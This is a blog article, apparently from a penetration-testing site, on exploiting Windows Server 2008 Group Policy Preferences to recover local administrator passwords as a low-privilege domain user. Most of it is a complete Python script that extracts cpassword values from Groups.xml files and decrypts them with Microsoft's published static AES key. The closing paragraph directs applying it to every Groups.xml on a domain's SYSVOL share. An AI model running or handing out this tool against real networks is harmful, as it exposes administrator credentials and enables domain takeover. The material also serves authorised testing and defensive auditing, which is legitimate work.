Exploiting Windows 2008 Group Policy Preferences

Fri 20 January 2012 by trance

Internal network pentests that involve domain controllers require several steps to reach domain administrator access, and one of them is usually obtaining local administrator access on a workstation. In this article we show how a limited domain user account can get there when specific Group Policy Preferences (GPP) are deployed. GPP are Active Directory features introduced with Windows Server 2008; documenting all of them is not the purpose of this article. We focus on the one called Local Users and Groups, which lets a domain administrator remotely create local accounts on a given list of machines. After explaining how those settings, and especially the passwords they carry, are downloaded to domain workstations, we highlight an existing but poorly known vulnerability, or rather documented feature, that lets any limited domain user decrypt them instantly.
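As an added example (not code from the original article), the Python script below does what the last sentence alludes to: it pulls the cpassword attributes out of a Groups.xml, the file the Local Users and Groups preference writes under the policy's Machine\Preferences\Groups folder in SYSVOL, and decrypts them with the AES-256 key Microsoft publishes in MS-GPPREF section 2.2.1.1.4. AES is implemented inline so the script needs nothing beyond the standard library. The Groups.xml in it is a constructed sample with the attribute layout the preference uses, and its cpassword is a value widely circulated as a test vector for GPP decryption tools. The script handles the three details that trip people up: the stripped base64 padding, the all-zero IV with PKCS#7 padding, and the UTF-16LE encoding of the decrypted .NET string.

```python
import base64
import xml.etree.ElementTree as ET

# Static AES-256 key Microsoft publishes in MS-GPPREF, section 2.2.1.1.4 ("Password Encryption").
GPP_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8"
                        "f496e806cc057990209b09a433b66c1b")

def _build_sbox():
    """Derive the AES S-box: GF(2^8) inverse followed by the affine map."""
    sbox = [0] * 256
    p = q = 1                                                    # invariant: p * q == 1
    while True:
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF   # p *= 3
        q = (q ^ (q << 1)) & 0xFF                                # q /= 3
        q = (q ^ (q << 2)) & 0xFF
        q = (q ^ (q << 4)) & 0xFF
        q ^= 0x09 if q & 0x80 else 0
        x = q ^ (q << 1) ^ (q << 2) ^ (q << 3) ^ (q << 4)      # q xor its 4 rotations
        sbox[p] = ((x ^ (x >> 8)) & 0xFF) ^ 0x63
        if p == 1:
            break
    sbox[0] = 0x63
    return sbox

SBOX = _build_sbox()
INV_SBOX = [SBOX.index(i) for i in range(256)]

def _xtime(a):
    return ((a << 1) ^ 0x1B) & 0xFF if a & 0x80 else a << 1

def _gmul(a, b):                                                 # multiply in GF(2^8)
    r = 0
    while b:
        if b & 1:
            r ^= a
        a, b = _xtime(a), b >> 1
    return r

def _expand_key(key):
    """AES key schedule: returns the 16-byte round keys (15 of them for AES-256)."""
    nk = len(key) // 4
    words = [list(key[i:i + 4]) for i in range(0, len(key), 4)]
    rcon = 1
    for i in range(nk, 4 * (nk + 7)):
        t = list(words[i - 1])
        if i % nk == 0:                                          # RotWord, SubWord, Rcon
            t = [SBOX[b] for b in t[1:] + t[:1]]
            t[0] ^= rcon
            rcon = _xtime(rcon)
        elif nk > 6 and i % nk == 4:                             # extra SubWord for AES-256
            t = [SBOX[b] for b in t]
        words.append([a ^ b for a, b in zip(words[i - nk], t)])
    return [sum(words[4 * r:4 * r + 4], []) for r in range(nk + 7)]

def _decrypt_block(round_keys, block):
    """Inverse cipher on one block; the state is column-major (index = col * 4 + row)."""
    s = [b ^ k for b, k in zip(block, round_keys[-1])]
    for r in range(len(round_keys) - 2, -1, -1):
        s = [s[((c - row) % 4) * 4 + row] for c in range(4) for row in range(4)]  # InvShiftRows
        s = [INV_SBOX[b] ^ k for b, k in zip(s, round_keys[r])]   # InvSubBytes + AddRoundKey
        if r > 0:                                                  # InvMixColumns
            s = [_gmul(s[4 * c + row], 14) ^ _gmul(s[4 * c + (row + 1) % 4], 11)
                 ^ _gmul(s[4 * c + (row + 2) % 4], 13) ^ _gmul(s[4 * c + (row + 3) % 4], 9)
                 for c in range(4) for row in range(4)]
    return bytes(s)

def aes_cbc_decrypt(key, ciphertext, iv=bytes(16)):
    """Raw AES-CBC decryption, no unpadding. GPP uses an all-zero IV."""
    if len(ciphertext) % 16:
        raise ValueError("ciphertext is not a whole number of AES blocks")
    round_keys = _expand_key(key)
    plain, prev = bytearray(), iv
    for i in range(0, len(ciphertext), 16):
        block = ciphertext[i:i + 16]
        plain += bytes(p ^ c for p, c in zip(_decrypt_block(round_keys, block), prev))
        prev = block
    return bytes(plain)

def restore_base64_padding(s):
    """GPP writes cpassword as base64 with the trailing '=' characters stripped."""
    return s + "=" * (-len(s) % 4)

def decrypt_cpassword(cpassword):
    """Turn a Groups.xml cpassword attribute back into the clear-text password."""
    raw = aes_cbc_decrypt(GPP_KEY, base64.b64decode(restore_base64_padding(cpassword)))
    pad = raw[-1] if raw else 0                                    # PKCS#7 padding byte
    if not 1 <= pad <= 16 or raw[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad padding: not a GPP cpassword, or a corrupted one")
    return raw[:-pad].decode("utf-16-le")                          # .NET strings are UTF-16LE

def extract_cpasswords(groups_xml):
    """Return (userName, cpassword) pairs for every account entry carrying a password."""
    return [(p.get("userName"), p.get("cpassword"))
            for p in ET.fromstring(groups_xml).iter("Properties") if p.get("cpassword")]

# Constructed sample in the shape of ...\Policies\{GUID}\Machine\Preferences\Groups\Groups.xml;
# the cpassword is a value widely circulated as a test vector for GPP decryption tools.
SAMPLE_GROUPS_XML = """<Groups><User name="LocalAdmin" image="2" changed="2012-01-20 10:00:00">
  <Properties action="U" newName="" fullName="" description="" changeLogon="0" noChange="1" neverExpires="1"
    acctDisabled="0" userName="LocalAdmin" cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"/></User></Groups>"""
```

Calling `decrypt_cpassword` on each pair returned by `extract_cpasswords(SAMPLE_GROUPS_XML)` yields the clear-text password for the LocalAdmin entry. In an engagement the input is every Groups.xml found under the domain's SYSVOL share, which any authenticated domain user can read; the same cpassword attribute, and therefore the same decryption routine, also appears in the XML files of other preferences that embed credentials.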
